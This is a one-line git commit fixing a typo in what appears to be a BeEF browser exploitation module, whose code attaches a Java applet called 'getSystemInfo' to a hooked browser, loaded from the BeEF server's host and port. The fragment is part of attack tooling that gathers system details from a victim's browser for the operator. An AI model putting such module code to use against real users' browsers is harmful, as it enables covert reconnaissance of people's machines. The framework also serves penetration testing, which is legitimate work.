Fixed typo

Extra 'i' from vim insert mode
This commit is contained in:
bcoles
2013-08-09 13:34:24 +09:30
parent 858814c614
commit f2883e0c94

View File

@@ -10,7 +10,7 @@ beef.execute(function() {
var timeout = 30;
var output;
beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', ibeef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
if (beef.browser.isFF()) {